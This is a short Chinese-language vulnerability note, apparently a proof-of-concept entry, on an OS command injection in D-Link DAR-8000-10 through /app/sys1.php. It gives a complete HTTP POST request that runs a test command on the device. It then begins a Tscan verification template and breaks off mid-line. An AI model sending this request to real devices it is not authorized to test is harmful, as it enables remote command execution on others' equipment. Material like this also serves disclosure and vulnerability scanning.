0x01漏洞描述
D-Link DAR-8000-10版本存在操作系统命令注入漏洞,该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。
0x02漏洞复现
(1)payload利用地址:
/app/sys1.php
(2)命令执行POC:
POST /app/sys1.php HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
cmd=echo+12345111
0x03POC使用(Tscan验证)
params: []
name: D-Link DAR-8000操作系统命令注入漏洞
se